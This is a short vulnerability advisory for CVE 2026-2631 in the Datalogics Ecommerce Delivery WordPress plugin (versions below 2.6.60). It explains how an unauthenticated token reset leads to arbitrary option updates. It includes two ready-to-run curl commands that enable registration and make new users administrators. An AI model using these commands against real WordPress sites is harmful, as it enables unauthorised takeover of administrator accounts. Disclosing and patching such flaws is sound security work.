Datalogics Ecommerce Delivery < 2.6.60 – Unauthenticated Privilege Escalation | CVE 2026-2631

Description

The plugin exposes an unauthenticated REST endpoint that allows any remote user to modify the option `datalogics_token` without verification. This token is subsequently used for authentication in a protected endpoint that allows users to perform arbitrary WordPress `update_option()` operations. Attackers can use this to enable registartion and to set the default role as Administrator.

Proof of Concept

Run:

```
curl -X POST "http://example.com/index.php?rest_route=/datalogics-0/v1/update-token" \
  -H "Content-Type: application/json" \
  -d '{"token":"NXPOC-2026"}'
```


Perform Privilege Escalation via Arbitrary Option Update:

```
curl -X POST "http://example.com/index.php?rest_route=/datalogics-0/v1/update-settings" \
  -H "Content-Type: application/json" \
  -d '{
        "token":"NXPOC-2026",
        "settings":{
          "users_can_register":"1",
          "default_role":"administrator"
        }
      }'
```

In "Settings > General" see that registration has been enabled and that the default role is "Administrator"